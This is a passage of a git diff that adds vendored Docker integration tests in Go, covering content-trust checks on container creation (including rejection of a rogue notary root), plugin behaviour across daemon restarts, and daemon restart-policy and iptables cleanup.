createCmd := exec.Command(dockerBinary, "create", repoName) + s.trustedCmd(createCmd) + out, _, err := runCommandWithOutput(createCmd) + 
c.Assert(err, check.IsNil) + c.Assert(string(out), checker.Contains, "Tagging", check.Commentf("Missing expected output on trusted push:\n%s", out)) + + dockerCmd(c, "rmi", repoName) + + // Try untrusted create to ensure we pushed the tag to the registry + createCmd = exec.Command(dockerBinary, "create", "--disable-content-trust=true", repoName) + s.trustedCmd(createCmd) + out, _, err = runCommandWithOutput(createCmd) + c.Assert(err, check.IsNil) + c.Assert(string(out), checker.Contains, "Status: Downloaded", check.Commentf("Missing expected output on trusted create with --disable-content-trust:\n%s", out)) + +} + +func (s *DockerTrustSuite) TestUntrustedCreate(c *check.C) { + repoName := fmt.Sprintf("%v/dockercliuntrusted/createtest", privateRegistryURL) + withTagName := fmt.Sprintf("%s:latest", repoName) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", withTagName) + dockerCmd(c, "push", withTagName) + dockerCmd(c, "rmi", withTagName) + + // Try trusted create on untrusted tag + createCmd := exec.Command(dockerBinary, "create", withTagName) + s.trustedCmd(createCmd) + out, _, err := runCommandWithOutput(createCmd) + c.Assert(err, check.Not(check.IsNil)) + c.Assert(string(out), checker.Contains, fmt.Sprintf("does not have trust data for %s", repoName), check.Commentf("Missing expected output on trusted create:\n%s", out)) + +} + +func (s *DockerTrustSuite) TestTrustedIsolatedCreate(c *check.C) { + repoName := s.setupTrustedImage(c, "trusted-isolated-create") + + // Try create + createCmd := exec.Command(dockerBinary, "--config", "/tmp/docker-isolated-create", "create", repoName) + s.trustedCmd(createCmd) + out, _, err := runCommandWithOutput(createCmd) + c.Assert(err, check.IsNil) + c.Assert(string(out), checker.Contains, "Tagging", check.Commentf("Missing expected output on trusted push:\n%s", out)) + + dockerCmd(c, "rmi", repoName) +} + +func (s *DockerTrustSuite) TestCreateWhenCertExpired(c *check.C) { + 
c.Skip("Currently changes system time, causing instability") + repoName := s.setupTrustedImage(c, "trusted-create-expired") + + // Certificates have 10 years of expiration + elevenYearsFromNow := time.Now().Add(time.Hour * 24 * 365 * 11) + + runAtDifferentDate(elevenYearsFromNow, func() { + // Try create + createCmd := exec.Command(dockerBinary, "create", repoName) + s.trustedCmd(createCmd) + out, _, err := runCommandWithOutput(createCmd) + c.Assert(err, check.Not(check.IsNil)) + c.Assert(string(out), checker.Contains, "could not validate the path to a trusted root", check.Commentf("Missing expected output on trusted create in the distant future:\n%s", out)) + }) + + runAtDifferentDate(elevenYearsFromNow, func() { + // Try create + createCmd := exec.Command(dockerBinary, "create", "--disable-content-trust", repoName) + s.trustedCmd(createCmd) + out, _, err := runCommandWithOutput(createCmd) + c.Assert(err, check.Not(check.IsNil)) + c.Assert(string(out), checker.Contains, "Status: Downloaded", check.Commentf("Missing expected output on trusted create in the distant future:\n%s", out)) + + }) +} + +func (s *DockerTrustSuite) TestTrustedCreateFromBadTrustServer(c *check.C) { + repoName := fmt.Sprintf("%v/dockerclievilcreate/trusted:latest", privateRegistryURL) + evilLocalConfigDir, err := ioutil.TempDir("", "evilcreate-local-config-dir") + c.Assert(err, check.IsNil) + + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + + pushCmd := exec.Command(dockerBinary, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil) + c.Assert(string(out), checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push:\n%s", out)) + + dockerCmd(c, "rmi", repoName) + + // Try create + createCmd := exec.Command(dockerBinary, "create", repoName) + s.trustedCmd(createCmd) + out, _, err = runCommandWithOutput(createCmd) + 
c.Assert(err, check.IsNil) + c.Assert(string(out), checker.Contains, "Tagging", check.Commentf("Missing expected output on trusted push:\n%s", out)) + + dockerCmd(c, "rmi", repoName) + + // Kill the notary server, start a new "evil" one. + s.not.Close() + s.not, err = newTestNotary(c) + c.Assert(err, check.IsNil) + + // In order to make an evil server, lets re-init a client (with a different trust dir) and push new data. + // tag an image and upload it to the private registry + dockerCmd(c, "--config", evilLocalConfigDir, "tag", "busybox", repoName) + + // Push up to the new server + pushCmd = exec.Command(dockerBinary, "--config", evilLocalConfigDir, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err = runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil) + c.Assert(string(out), checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push:\n%s", out)) + + // Now, try creating with the original client from this new trust server. This should fail because the new root is invalid. 
+ createCmd = exec.Command(dockerBinary, "create", repoName) + s.trustedCmd(createCmd) + out, _, err = runCommandWithOutput(createCmd) + if err == nil { + c.Fatalf("Continuing with cached data even though it's an invalid root rotation: %s\n%s", err, out) + } + if !strings.Contains(out, "could not rotate trust to a new trusted root") { + c.Fatalf("Missing expected output on trusted create:\n%s", out) + } + +} + +func (s *DockerSuite) TestCreateStopSignal(c *check.C) { + name := "test_create_stop_signal" + dockerCmd(c, "create", "--name", name, "--stop-signal", "9", "busybox") + + res := inspectFieldJSON(c, name, "Config.StopSignal") + c.Assert(res, checker.Contains, "9") + +} + +func (s *DockerSuite) TestCreateWithWorkdir(c *check.C) { + name := "foo" + + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + dir := prefix + slash + "home" + slash + "foo" + slash + "bar" + + dockerCmd(c, "create", "--name", name, "-w", dir, "busybox") + // Windows does not create the workdir until the container is started + if daemonPlatform == "windows" { + dockerCmd(c, "start", name) + } + dockerCmd(c, "cp", fmt.Sprintf("%s:%s", name, dir), prefix+slash+"tmp") +} + +func (s *DockerSuite) TestCreateWithInvalidLogOpts(c *check.C) { + name := "test-invalidate-log-opts" + out, _, err := dockerCmdWithError("create", "--name", name, "--log-opt", "invalid=true", "busybox") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "unknown log opt") + + out, _ = dockerCmd(c, "ps", "-a") + c.Assert(out, checker.Not(checker.Contains), name) +} + +// #20972 +func (s *DockerSuite) TestCreate64ByteHexID(c *check.C) { + out := inspectField(c, "busybox", "Id") + imageID := strings.TrimPrefix(strings.TrimSpace(string(out)), "sha256:") + + dockerCmd(c, "create", imageID) +} + +// Test case for #23498 +func (s *DockerSuite) TestCreateUnsetEntrypoint(c *check.C) { + name := "test-entrypoint" + dockerfile := `FROM busybox +ADD entrypoint.sh /entrypoint.sh +RUN chmod 755 /entrypoint.sh 
+ENTRYPOINT ["/entrypoint.sh"] +CMD echo foobar` + + ctx, err := fakeContext(dockerfile, map[string]string{ + "entrypoint.sh": `#!/bin/sh +echo "I am an entrypoint" +exec "$@"`, + }) + c.Assert(err, check.IsNil) + defer ctx.Close() + + _, err = buildImageFromContext(name, ctx, true) + c.Assert(err, check.IsNil) + + out, _ := dockerCmd(c, "create", "--entrypoint=", name, "echo", "foo") + id := strings.TrimSpace(out) + c.Assert(id, check.Not(check.Equals), "") + out, _ = dockerCmd(c, "start", "-a", id) + c.Assert(strings.TrimSpace(out), check.Equals, "foo") +} + +// #22471 +func (s *DockerSuite) TestCreateStopTimeout(c *check.C) { + name1 := "test_create_stop_timeout_1" + dockerCmd(c, "create", "--name", name1, "--stop-timeout", "15", "busybox") + + res := inspectFieldJSON(c, name1, "Config.StopTimeout") + c.Assert(res, checker.Contains, "15") + + name2 := "test_create_stop_timeout_2" + dockerCmd(c, "create", "--name", name2, "busybox") + + res = inspectFieldJSON(c, name2, "Config.StopTimeout") + c.Assert(res, checker.Contains, "null") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_plugins_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_plugins_test.go new file mode 100644 index 0000000000..f91edc6555 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_plugins_test.go @@ -0,0 +1,317 @@ +// +build linux + +package main + +import ( + "os" + "os/exec" + "path/filepath" + "strings" + "syscall" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/mount" + "github.com/go-check/check" +) + +// TestDaemonRestartWithPluginEnabled tests state restore for an enabled plugin +func (s *DockerDaemonSuite) TestDaemonRestartWithPluginEnabled(c *check.C) { + testRequires(c, IsAmd64, Network) + + if err := s.d.Start(); err != nil { + c.Fatalf("Could not start daemon: %v", err) + } + + if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", 
pName); err != nil { + c.Fatalf("Could not install plugin: %v %s", err, out) + } + + defer func() { + if out, err := s.d.Cmd("plugin", "disable", pName); err != nil { + c.Fatalf("Could not disable plugin: %v %s", err, out) + } + if out, err := s.d.Cmd("plugin", "remove", pName); err != nil { + c.Fatalf("Could not remove plugin: %v %s", err, out) + } + }() + + if err := s.d.Restart(); err != nil { + c.Fatalf("Could not restart daemon: %v", err) + } + + out, err := s.d.Cmd("plugin", "ls") + if err != nil { + c.Fatalf("Could not list plugins: %v %s", err, out) + } + c.Assert(out, checker.Contains, pName) + c.Assert(out, checker.Contains, "true") +} + +// TestDaemonRestartWithPluginDisabled tests state restore for a disabled plugin +func (s *DockerDaemonSuite) TestDaemonRestartWithPluginDisabled(c *check.C) { + testRequires(c, IsAmd64, Network) + + if err := s.d.Start(); err != nil { + c.Fatalf("Could not start daemon: %v", err) + } + + if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName, "--disable"); err != nil { + c.Fatalf("Could not install plugin: %v %s", err, out) + } + + defer func() { + if out, err := s.d.Cmd("plugin", "remove", pName); err != nil { + c.Fatalf("Could not remove plugin: %v %s", err, out) + } + }() + + if err := s.d.Restart(); err != nil { + c.Fatalf("Could not restart daemon: %v", err) + } + + out, err := s.d.Cmd("plugin", "ls") + if err != nil { + c.Fatalf("Could not list plugins: %v %s", err, out) + } + c.Assert(out, checker.Contains, pName) + c.Assert(out, checker.Contains, "false") +} + +// TestDaemonKillLiveRestoreWithPlugins SIGKILLs daemon started with --live-restore. +// Plugins should continue to run. 
+func (s *DockerDaemonSuite) TestDaemonKillLiveRestoreWithPlugins(c *check.C) { + testRequires(c, IsAmd64, Network) + + if err := s.d.Start("--live-restore"); err != nil { + c.Fatalf("Could not start daemon: %v", err) + } + if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName); err != nil { + c.Fatalf("Could not install plugin: %v %s", err, out) + } + defer func() { + if err := s.d.Restart("--live-restore"); err != nil { + c.Fatalf("Could not restart daemon: %v", err) + } + if out, err := s.d.Cmd("plugin", "disable", pName); err != nil { + c.Fatalf("Could not disable plugin: %v %s", err, out) + } + if out, err := s.d.Cmd("plugin", "remove", pName); err != nil { + c.Fatalf("Could not remove plugin: %v %s", err, out) + } + }() + + if err := s.d.Kill(); err != nil { + c.Fatalf("Could not kill daemon: %v", err) + } + + cmd := exec.Command("pgrep", "-f", pluginProcessName) + if out, ec, err := runCommandWithOutput(cmd); ec != 0 { + c.Fatalf("Expected exit code '0', got %d err: %v output: %s ", ec, err, out) + } +} + +// TestDaemonShutdownLiveRestoreWithPlugins SIGTERMs daemon started with --live-restore. +// Plugins should continue to run. 
+func (s *DockerDaemonSuite) TestDaemonShutdownLiveRestoreWithPlugins(c *check.C) { + testRequires(c, IsAmd64, Network) + + if err := s.d.Start("--live-restore"); err != nil { + c.Fatalf("Could not start daemon: %v", err) + } + if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName); err != nil { + c.Fatalf("Could not install plugin: %v %s", err, out) + } + defer func() { + if err := s.d.Restart("--live-restore"); err != nil { + c.Fatalf("Could not restart daemon: %v", err) + } + if out, err := s.d.Cmd("plugin", "disable", pName); err != nil { + c.Fatalf("Could not disable plugin: %v %s", err, out) + } + if out, err := s.d.Cmd("plugin", "remove", pName); err != nil { + c.Fatalf("Could not remove plugin: %v %s", err, out) + } + }() + + if err := s.d.cmd.Process.Signal(os.Interrupt); err != nil { + c.Fatalf("Could not kill daemon: %v", err) + } + + cmd := exec.Command("pgrep", "-f", pluginProcessName) + if out, ec, err := runCommandWithOutput(cmd); ec != 0 { + c.Fatalf("Expected exit code '0', got %d err: %v output: %s ", ec, err, out) + } +} + +// TestDaemonShutdownWithPlugins shuts down running plugins. 
+func (s *DockerDaemonSuite) TestDaemonShutdownWithPlugins(c *check.C) { + testRequires(c, IsAmd64, Network, SameHostDaemon) + + if err := s.d.Start(); err != nil { + c.Fatalf("Could not start daemon: %v", err) + } + if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName); err != nil { + c.Fatalf("Could not install plugin: %v %s", err, out) + } + + defer func() { + if err := s.d.Restart(); err != nil { + c.Fatalf("Could not restart daemon: %v", err) + } + if out, err := s.d.Cmd("plugin", "disable", pName); err != nil { + c.Fatalf("Could not disable plugin: %v %s", err, out) + } + if out, err := s.d.Cmd("plugin", "remove", pName); err != nil { + c.Fatalf("Could not remove plugin: %v %s", err, out) + } + }() + + if err := s.d.cmd.Process.Signal(os.Interrupt); err != nil { + c.Fatalf("Could not kill daemon: %v", err) + } + + for { + if err := syscall.Kill(s.d.cmd.Process.Pid, 0); err == syscall.ESRCH { + break + } + } + + cmd := exec.Command("pgrep", "-f", pluginProcessName) + if out, ec, err := runCommandWithOutput(cmd); ec != 1 { + c.Fatalf("Expected exit code '1', got %d err: %v output: %s ", ec, err, out) + } + + s.d.Start("--live-restore") + cmd = exec.Command("pgrep", "-f", pluginProcessName) + out, _, err := runCommandWithOutput(cmd) + c.Assert(err, checker.IsNil, check.Commentf(out)) +} + +// TestVolumePlugin tests volume creation using a plugin. 
func (s *DockerDaemonSuite) TestVolumePlugin(c *check.C) {
	testRequires(c, IsAmd64, Network)

	volName := "plugin-volume"
	destDir := "/tmp/data/"
	destFile := "foo"

	if err := s.d.Start(); err != nil {
		c.Fatalf("Could not start daemon: %v", err)
	}
	out, err := s.d.Cmd("plugin", "install", pName, "--grant-all-permissions")
	if err != nil {
		c.Fatalf("Could not install plugin: %v %s", err, out)
	}
	pluginID, err := s.d.Cmd("plugin", "inspect", "-f", "{{.Id}}", pName)
	pluginID = strings.TrimSpace(pluginID)
	if err != nil {
		c.Fatalf("Could not retrieve plugin ID: %v %s", err, pluginID)
	}
	// Plugin rootfs lives under <daemon-root>/plugins/<id>/rootfs; used below
	// to assert its mounts are cleaned up once the plugin is removed.
	mountpointPrefix := filepath.Join(s.d.RootDir(), "plugins", pluginID, "rootfs")
	defer func() {
		if out, err := s.d.Cmd("plugin", "disable", pName); err != nil {
			c.Fatalf("Could not disable plugin: %v %s", err, out)
		}

		if out, err := s.d.Cmd("plugin", "remove", pName); err != nil {
			c.Fatalf("Could not remove plugin: %v %s", err, out)
		}

		// After removal no mount under the plugin's rootfs may remain.
		exists, err := existsMountpointWithPrefix(mountpointPrefix)
		c.Assert(err, checker.IsNil)
		c.Assert(exists, checker.Equals, false)

	}()

	out, err = s.d.Cmd("volume", "create", "-d", pName, volName)
	if err != nil {
		c.Fatalf("Could not create volume: %v %s", err, out)
	}
	// NOTE: deferred after the plugin-cleanup defer above, so this runs FIRST
	// (LIFO): the volume must be gone before the plugin can be disabled.
	defer func() {
		if out, err := s.d.Cmd("volume", "remove", volName); err != nil {
			c.Fatalf("Could not remove volume: %v %s", err, out)
		}
	}()

	out, err = s.d.Cmd("volume", "ls")
	if err != nil {
		c.Fatalf("Could not list volume: %v %s", err, out)
	}
	c.Assert(out, checker.Contains, volName)
	c.Assert(out, checker.Contains, pName)

	mountPoint, err := s.d.Cmd("volume", "inspect", volName, "--format", "{{.Mountpoint}}")
	if err != nil {
		c.Fatalf("Could not inspect volume: %v %s", err, mountPoint)
	}
	mountPoint = strings.TrimSpace(mountPoint)

	// Write a file through a container, then verify it is visible on the host
	// inside the plugin's rootfs at the volume's mountpoint.
	out, err = s.d.Cmd("run", "--rm", "-v", volName+":"+destDir, "busybox", "touch", destDir+destFile)
	c.Assert(err, checker.IsNil, check.Commentf(out))
	path := filepath.Join(s.d.RootDir(), "plugins", pluginID, "rootfs", mountPoint, destFile)
	_, err = os.Lstat(path)
	c.Assert(err, checker.IsNil)

	// While the plugin is in use its rootfs must be mounted.
	exists, err := existsMountpointWithPrefix(mountpointPrefix)
	c.Assert(err, checker.IsNil)
	c.Assert(exists, checker.Equals, true)
}

// TestGraphdriverPlugin exercises a plugin as the daemon's storage driver:
// install it, restart the daemon with -s <plugin>, then run a container.
func (s *DockerDaemonSuite) TestGraphdriverPlugin(c *check.C) {
	testRequires(c, Network, IsAmd64, DaemonIsLinux, overlay2Supported, ExperimentalDaemon)

	s.d.Start()

	// install the plugin
	plugin := "cpuguy83/docker-overlay2-graphdriver-plugin"
	out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", plugin)
	c.Assert(err, checker.IsNil, check.Commentf(out))

	// restart the daemon with the plugin set as the storage driver
	s.d.Restart("-s", plugin, "--storage-opt", "overlay2.override_kernel_check=1")

	// run a container
	out, err = s.d.Cmd("run", "--rm", "busybox", "true") // this will pull busybox using the plugin
	c.Assert(err, checker.IsNil, check.Commentf(out))
}

// TestPluginVolumeRemoveOnRestart verifies that a plugin-backed volume keeps
// the plugin "in use" across a --live-restore daemon restart: disabling the
// plugin must fail until the volume is removed.
func (s *DockerDaemonSuite) TestPluginVolumeRemoveOnRestart(c *check.C) {
	testRequires(c, DaemonIsLinux, Network, IsAmd64)

	s.d.Start("--live-restore=true")

	out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName)
	c.Assert(err, checker.IsNil, check.Commentf(out))
	c.Assert(strings.TrimSpace(out), checker.Contains, pName)

	out, err = s.d.Cmd("volume", "create", "--driver", pName, "test")
	c.Assert(err, checker.IsNil, check.Commentf(out))

	s.d.Restart("--live-restore=true")

	// The volume reference must survive the restart: disable is rejected.
	out, err = s.d.Cmd("plugin", "disable", pName)
	c.Assert(err, checker.NotNil, check.Commentf(out))
	c.Assert(out, checker.Contains, "in use")

	out, err = s.d.Cmd("volume", "rm", "test")
	c.Assert(err, checker.IsNil, check.Commentf(out))

	// With the volume gone, disable and remove must now succeed.
	out, err = s.d.Cmd("plugin", "disable", pName)
	c.Assert(err, checker.IsNil, check.Commentf(out))

	out, err = s.d.Cmd("plugin", "rm", pName)
	c.Assert(err, checker.IsNil, check.Commentf(out))
}

// existsMountpointWithPrefix reports whether any mount in the host's mount
// table has a mountpoint path starting with mountpointPrefix.
func existsMountpointWithPrefix(mountpointPrefix string) (bool, error) {
	mounts, err := mount.GetMounts()
	if err != nil {
		return false, err
	}
	for _, mnt := range mounts {
		if strings.HasPrefix(mnt.Mountpoint, mountpointPrefix) {
			return true, nil
		}
	}
	return false, nil
}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_test.go
new file mode 100644
index 0000000000..3a74fe215f
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_test.go
@@ -0,0 +1,2988 @@
// +build linux

package main

import (
	"bufio"
	"bytes"
	"encoding/json"
	"fmt"
	"io"
	"io/ioutil"
	"net"
	"os"
	"os/exec"
	"path"
	"path/filepath"
	"regexp"
	"strconv"
	"strings"
	"sync"
	"syscall"
	"time"

	"github.com/docker/docker/pkg/integration/checker"
	icmd "github.com/docker/docker/pkg/integration/cmd"
	"github.com/docker/docker/pkg/mount"
	"github.com/docker/docker/pkg/stringid"
	"github.com/docker/go-units"
	"github.com/docker/libnetwork/iptables"
	"github.com/docker/libtrust"
	"github.com/go-check/check"
	"github.com/kr/pty"
)

// TestLegacyDaemonCommand test starting docker daemon using "deprecated" docker daemon
// command. Remove this test when we remove this.
func (s *DockerDaemonSuite) TestLegacyDaemonCommand(c *check.C) {
	// Only verifies that the legacy `docker daemon` entry point still starts;
	// the process is killed immediately after.
	cmd := exec.Command(dockerBinary, "daemon", "--storage-driver=vfs", "--debug")
	err := cmd.Start()
	c.Assert(err, checker.IsNil, check.Commentf("could not start daemon using 'docker daemon'"))

	c.Assert(cmd.Process.Kill(), checker.IsNil)
}

// TestDaemonRestartWithRunningContainersPorts verifies that across a daemon
// restart a --restart=always container comes back up while a default
// (--restart=no) container stays stopped.
func (s *DockerDaemonSuite) TestDaemonRestartWithRunningContainersPorts(c *check.C) {
	if err := s.d.StartWithBusybox(); err != nil {
		c.Fatalf("Could not start daemon with busybox: %v", err)
	}

	if out, err := s.d.Cmd("run", "-d", "--name", "top1", "-p", "1234:80", "--restart", "always", "busybox:latest", "top"); err != nil {
		c.Fatalf("Could not run top1: err=%v\n%s", err, out)
	}
	// --restart=no by default
	if out, err := s.d.Cmd("run", "-d", "--name", "top2", "-p", "80", "busybox:latest", "top"); err != nil {
		c.Fatalf("Could not run top2: err=%v\n%s", err, out)
	}

	// testRun asserts, per container name, whether `docker ps` lists it
	// (i.e. whether it is expected to be running).
	testRun := func(m map[string]bool, prefix string) {
		var format string
		for cont, shouldRun := range m {
			out, err := s.d.Cmd("ps")
			if err != nil {
				c.Fatalf("Could not run ps: err=%v\n%q", err, out)
			}
			if shouldRun {
				format = "%scontainer %q is not running"
			} else {
				format = "%scontainer %q is running"
			}
			if shouldRun != strings.Contains(out, cont) {
				c.Fatalf(format, prefix, cont)
			}
		}
	}

	testRun(map[string]bool{"top1": true, "top2": true}, "")

	if err := s.d.Restart(); err != nil {
		c.Fatalf("Could not restart daemon: %v", err)
	}
	testRun(map[string]bool{"top1": true, "top2": false}, "After daemon restart: ")
}

// TestDaemonRestartWithVolumesRefs verifies that volume references recorded
// before a daemon restart are still resolvable afterwards (--volumes-from a
// pre-restart container, and the volume surviving `rm -fv` of the borrower).
func (s *DockerDaemonSuite) TestDaemonRestartWithVolumesRefs(c *check.C) {
	if err := s.d.StartWithBusybox(); err != nil {
		c.Fatal(err)
	}

	if out, err := s.d.Cmd("run", "--name", "volrestarttest1", "-v", "/foo", "busybox"); err != nil {
		c.Fatal(err, out)
	}

	if err := s.d.Restart(); err != nil {
		c.Fatal(err)
	}

	if _, err := s.d.Cmd("run", "-d", "--volumes-from", "volrestarttest1", "--name", "volrestarttest2", "busybox", "top"); err != nil {
		c.Fatal(err)
	}

	if out, err := s.d.Cmd("rm", "-fv", "volrestarttest2"); err != nil {
		c.Fatal(err, out)
	}

	out, err := s.d.Cmd("inspect", "-f", "{{json .Mounts}}", "volrestarttest1")
	c.Assert(err, check.IsNil)

	// The /foo mount of the original container must still exist.
	if _, err := inspectMountPointJSON(out, "/foo"); err != nil {
		c.Fatalf("Expected volume to exist: /foo, error: %v\n", err)
	}
}

// #11008
// TestDaemonRestartUnlessStopped verifies --restart=unless-stopped semantics
// across daemon restarts: a container stopped by the user stays stopped,
// while --restart=always comes back; once started again it survives restarts.
func (s *DockerDaemonSuite) TestDaemonRestartUnlessStopped(c *check.C) {
	err := s.d.StartWithBusybox()
	c.Assert(err, check.IsNil)

	out, err := s.d.Cmd("run", "-d", "--name", "top1", "--restart", "always", "busybox:latest", "top")
	c.Assert(err, check.IsNil, check.Commentf("run top1: %v", out))

	out, err = s.d.Cmd("run", "-d", "--name", "top2", "--restart", "unless-stopped", "busybox:latest", "top")
	c.Assert(err, check.IsNil, check.Commentf("run top2: %v", out))

	// testRun asserts, per container name, whether `docker ps` lists it.
	testRun := func(m map[string]bool, prefix string) {
		var format string
		for name, shouldRun := range m {
			out, err := s.d.Cmd("ps")
			c.Assert(err, check.IsNil, check.Commentf("run ps: %v", out))
			if shouldRun {
				format = "%scontainer %q is not running"
			} else {
				format = "%scontainer %q is running"
			}
			c.Assert(strings.Contains(out, name), check.Equals, shouldRun, check.Commentf(format, prefix, name))
		}
	}

	// both running
	testRun(map[string]bool{"top1": true, "top2": true}, "")

	out, err = s.d.Cmd("stop", "top1")
	c.Assert(err, check.IsNil, check.Commentf(out))

	out, err = s.d.Cmd("stop", "top2")
	c.Assert(err, check.IsNil, check.Commentf(out))

	// both stopped
	testRun(map[string]bool{"top1": false, "top2": false}, "")

	err = s.d.Restart()
	c.Assert(err, check.IsNil)

	// restart=always running
	testRun(map[string]bool{"top1": true, "top2": false}, "After daemon restart: ")

	out, err = s.d.Cmd("start", "top2")
	c.Assert(err, check.IsNil, check.Commentf("start top2: %v", out))

	err = s.d.Restart()
	c.Assert(err, check.IsNil)

	// both running
	testRun(map[string]bool{"top1": true, "top2": true}, "After second daemon restart: ")

}

// TestDaemonRestartOnFailure verifies that a container whose on-failure
// restart budget is exhausted is NOT restarted again by a daemon restart
// (checked via an unchanged StartedAt timestamp).
func (s *DockerDaemonSuite) TestDaemonRestartOnFailure(c *check.C) {
	err := s.d.StartWithBusybox()
	c.Assert(err, check.IsNil)

	out, err := s.d.Cmd("run", "-d", "--name", "test1", "--restart", "on-failure:3", "busybox:latest", "false")
	c.Assert(err, check.IsNil, check.Commentf("run top1: %v", out))

	// wait test1 to stop
	hostArgs := []string{"--host", s.d.sock()}
	err = waitInspectWithArgs("test1", "{{.State.Running}} {{.State.Restarting}}", "false false", 10*time.Second, hostArgs...)
	c.Assert(err, checker.IsNil, check.Commentf("test1 should exit but not"))

	// record last start time
	out, err = s.d.Cmd("inspect", "-f={{.State.StartedAt}}", "test1")
	c.Assert(err, checker.IsNil, check.Commentf("out: %v", out))
	lastStartTime := out

	err = s.d.Restart()
	c.Assert(err, check.IsNil)

	// test1 shouldn't restart at all
	err = waitInspectWithArgs("test1", "{{.State.Running}} {{.State.Restarting}}", "false false", 0, hostArgs...)
	c.Assert(err, checker.IsNil, check.Commentf("test1 should exit but not"))

	// make sure test1 isn't restarted when daemon restart
	// if "StartAt" time updates, means test1 was once restarted.
	out, err = s.d.Cmd("inspect", "-f={{.State.StartedAt}}", "test1")
	c.Assert(err, checker.IsNil, check.Commentf("out: %v", out))
	c.Assert(out, checker.Equals, lastStartTime, check.Commentf("test1 shouldn't start after daemon restarts"))
}

// TestDaemonStartIptablesFalse verifies the daemon starts with --iptables=false.
func (s *DockerDaemonSuite) TestDaemonStartIptablesFalse(c *check.C) {
	if err := s.d.Start("--iptables=false"); err != nil {
		c.Fatalf("we should have been able to start the daemon with passing iptables=false: %v", err)
	}
}

// Make sure we cannot shrink base device at daemon restart.
+func (s *DockerDaemonSuite) TestDaemonRestartWithInvalidBasesize(c *check.C) { + testRequires(c, Devicemapper) + c.Assert(s.d.Start(), check.IsNil) + + oldBasesizeBytes := s.d.getBaseDeviceSize(c) + var newBasesizeBytes int64 = 1073741824 //1GB in bytes + + if newBasesizeBytes < oldBasesizeBytes { + err := s.d.Restart("--storage-opt", fmt.Sprintf("dm.basesize=%d", newBasesizeBytes)) + c.Assert(err, check.IsNil, check.Commentf("daemon should not have started as new base device size is less than existing base device size: %v", err)) + } + c.Assert(s.d.Stop(), check.IsNil) +} + +// Make sure we can grow base device at daemon restart. +func (s *DockerDaemonSuite) TestDaemonRestartWithIncreasedBasesize(c *check.C) { + testRequires(c, Devicemapper) + c.Assert(s.d.Start(), check.IsNil) + + oldBasesizeBytes := s.d.getBaseDeviceSize(c) + + var newBasesizeBytes int64 = 53687091200 //50GB in bytes + + if newBasesizeBytes < oldBasesizeBytes { + c.Skip(fmt.Sprintf("New base device size (%v) must be greater than (%s)", units.HumanSize(float64(newBasesizeBytes)), units.HumanSize(float64(oldBasesizeBytes)))) + } + + err := s.d.Restart("--storage-opt", fmt.Sprintf("dm.basesize=%d", newBasesizeBytes)) + c.Assert(err, check.IsNil, check.Commentf("we should have been able to start the daemon with increased base device size: %v", err)) + + basesizeAfterRestart := s.d.getBaseDeviceSize(c) + newBasesize, err := convertBasesize(newBasesizeBytes) + c.Assert(err, check.IsNil, check.Commentf("Error in converting base device size: %v", err)) + c.Assert(newBasesize, check.Equals, basesizeAfterRestart, check.Commentf("Basesize passed is not equal to Basesize set")) + c.Assert(s.d.Stop(), check.IsNil) +} + +// Issue #8444: If docker0 bridge is modified (intentionally or unintentionally) and +// no longer has an IP associated, we should gracefully handle that case and associate +// an IP with it rather than fail daemon start +func (s *DockerDaemonSuite) 
TestDaemonStartBridgeWithoutIPAssociation(c *check.C) { + // rather than depending on brctl commands to verify docker0 is created and up + // let's start the daemon and stop it, and then make a modification to run the + // actual test + if err := s.d.Start(); err != nil { + c.Fatalf("Could not start daemon: %v", err) + } + if err := s.d.Stop(); err != nil { + c.Fatalf("Could not stop daemon: %v", err) + } + + // now we will remove the ip from docker0 and then try starting the daemon + ipCmd := exec.Command("ip", "addr", "flush", "dev", "docker0") + stdout, stderr, _, err := runCommandWithStdoutStderr(ipCmd) + if err != nil { + c.Fatalf("failed to remove docker0 IP association: %v, stdout: %q, stderr: %q", err, stdout, stderr) + } + + if err := s.d.Start(); err != nil { + warning := "**WARNING: Docker bridge network in bad state--delete docker0 bridge interface to fix" + c.Fatalf("Could not start daemon when docker0 has no IP address: %v\n%s", err, warning) + } +} + +func (s *DockerDaemonSuite) TestDaemonIptablesClean(c *check.C) { + if err := s.d.StartWithBusybox(); err != nil { + c.Fatalf("Could not start daemon with busybox: %v", err) + } + + if out, err := s.d.Cmd("run", "-d", "--name", "top", "-p", "80", "busybox:latest", "top"); err != nil { + c.Fatalf("Could not run top: %s, %v", out, err) + } + + // get output from iptables with container running + ipTablesSearchString := "tcp dpt:80" + ipTablesCmd := exec.Command("iptables", "-nvL") + out, _, err := runCommandWithOutput(ipTablesCmd) + if err != nil { + c.Fatalf("Could not run iptables -nvL: %s, %v", out, err) + } + + if !strings.Contains(out, ipTablesSearchString) { + c.Fatalf("iptables output should have contained %q, but was %q", ipTablesSearchString, out) + } + + if err := s.d.Stop(); err != nil { + c.Fatalf("Could not stop daemon: %v", err) + } + + // get output from iptables after restart + ipTablesCmd = exec.Command("iptables", "-nvL") + out, _, err = runCommandWithOutput(ipTablesCmd) + if err != nil 
